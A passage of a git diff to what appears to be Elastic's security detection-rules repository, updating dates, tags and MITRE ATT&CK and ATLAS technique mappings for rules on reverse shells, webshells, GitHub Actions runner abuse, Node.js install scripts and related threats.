"Exploitation for Client Execution" - id = "T1203" - reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml index 13869c98f9b..5433f0a5906 100644 --- a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml +++ b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,19 +50,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] type = "eql" query = ''' sequence by host.id with maxspan=10s @@ -73,16 +61,6 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1204" name = "User Execution" @@ -97,29 +75,3 @@ reference = "https://attack.mitre.org/techniques/T1204/005/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/execution_openclaw_agent_child_process.toml b/rules/cross-platform/execution_openclaw_agent_child_process.toml index 919bf598224..fe4247891cb 100644 --- a/rules/cross-platform/execution_openclaw_agent_child_process.toml +++ b/rules/cross-platform/execution_openclaw_agent_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,18 +56,7 @@ references = [ risk_score = 47 rule_id = "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e" severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: LLM", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: LLM", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -83,36 +72,51 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat]] +framework = "MITRE ATLAS" +[[rule.threat.technique]] +id = "AML.T0051" +name = "LLM Prompt Injection" +reference = "https://atlas.mitre.org/techniques/AML.T0051/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - +id = "AML.TA0005" +name = "Execution" +reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml index e69435f0dc9..7c525f9c541 100644 --- a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml +++ b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,21 +67,3 @@ EggShell is a post-exploitation tool used on macOS and Linux systems, allowing a - Enhance monitoring and detection capabilities to identify similar threats in the future, focusing on command and scripting interpreter activities as outlined in MITRE ATT&CK technique T1059.""" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/execution_potential_widespread_malware_infection.toml b/rules/cross-platform/execution_potential_widespread_malware_infection.toml index 3f52c996a02..e884ea942a1 100644 --- a/rules/cross-platform/execution_potential_widespread_malware_infection.toml +++ b/rules/cross-platform/execution_potential_widespread_malware_infection.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2024/05/08" maturity = "production" -updated_date = "2025/07/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -72,21 +72,3 @@ from logs-endpoint.alerts-* ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml index 4a04cf04a54..477b492e00c 100644 --- a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml +++ b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/11/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,20 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,16 +99,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/execution_register_github_actions_runner.toml index bd5c534de51..68bacee30b4 100644 --- a/rules/cross-platform/execution_register_github_actions_runner.toml +++ b/rules/cross-platform/execution_register_github_actions_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,24 +65,7 @@ references = [ risk_score = 47 rule_id = "57e118c1-19eb-4c20-93a6-8a6c30a5b48b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -95,32 +78,31 @@ process where event.type == "start" and event.action in ("exec", "exec_event", " [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/execution_revershell_via_shell_cmd.toml index 62a96f31eb4..2b950a5e42a 100644 --- a/rules/cross-platform/execution_revershell_via_shell_cmd.toml +++ b/rules/cross-platform/execution_revershell_via_shell_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,15 +61,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -89,14 +81,31 @@ process where event.type in ("start", "process_started") and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml index a9a731ace09..143cd14ba11 100644 --- a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml +++ b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ references = [ risk_score = 73 rule_id = "f7d588ba-e4b0-442e-879d-7ec39fbd69c5" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -67,24 +58,18 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml index ac4891f7ad4..da67ad548c5 100644 --- a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml +++ b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ references = [ risk_score = 73 rule_id = "23c53c4c-aa8b-4b07-85c0-fe46a9c8acaf" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -84,24 +75,64 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml index 8ca0cdb5a1f..b204ba78215 100644 --- a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml +++ b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,16 +26,7 @@ references = [ risk_score = 73 rule_id = "c3f5e1d8-910e-43b4-8d44-d748e498ca86" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -109,24 +100,31 @@ Java Naming and Directory Interface (JNDI) is a Java API that provides naming an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - - -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_via_github_actions_runner.toml b/rules/cross-platform/execution_via_github_actions_runner.toml index 08782e87f48..970fad9a796 100644 --- a/rules/cross-platform/execution_via_github_actions_runner.toml +++ b/rules/cross-platform/execution_via_github_actions_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,24 +65,7 @@ references = [ risk_score = 47 rule_id = "a640ef5b-e1da-4b17-8391-468fdbd1b517" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -99,32 +82,48 @@ process where event.type == "start" and event.action in ("exec", "exec_event", " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml index ebd0cb49ce7..65d688cfd2b 100644 --- a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml +++ b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,17 +93,7 @@ After saving the integration change, the Elastic Agents running this policy will For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,49 +105,17 @@ not process.env_vars like~ "RUNNER_TRACKING_ID=github_*" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Initial Access" - id = "TA0001" - reference = "https://attack.mitre.org/tactics/TA0001/" - - [[rule.threat.technique]] - name = "Supply Chain Compromise" - id = "T1195" - reference = "https://attack.mitre.org/techniques/T1195/" - - [[rule.threat.technique.subtechnique]] - name = "Compromise Software Dependencies and Development Tools" - id = "T1195.001" - reference = "https://attack.mitre.org/techniques/T1195/001/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique]] - name = "Impair Defenses" - id = "T1562" - reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" - [[rule.threat.technique.subtechnique]] - name = "Disable or Modify Tools" - id = "T1562.001" - reference = "https://attack.mitre.org/techniques/T1562/001/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml index a0c85693771..3d12517555c 100644 --- a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml +++ b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2026/01/26" maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -125,10 +125,3 @@ post-compromise activity. - Monitor the environment for recurrence of similar high-CPU processes combined with security alerts. - Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml index a62746b856a..814bf8f4631 100644 --- a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml +++ b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2026/01/26" maturity = "production" -updated_date = "2026/02/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -127,6 +127,16 @@ within a short time window. This combination may indicate malicious execution, r [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" + +[[rule.threat.technique.subtechnique]] +id = "T1496.001" +name = "Compute Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/001/" + [rule.threat.tactic] id = "TA0040" name = "Impact" diff --git a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml index 0c42ed1077a..7f45c3c1b83 100644 --- a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml +++ b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml @@ -2,7 +2,7 @@ creation_date = 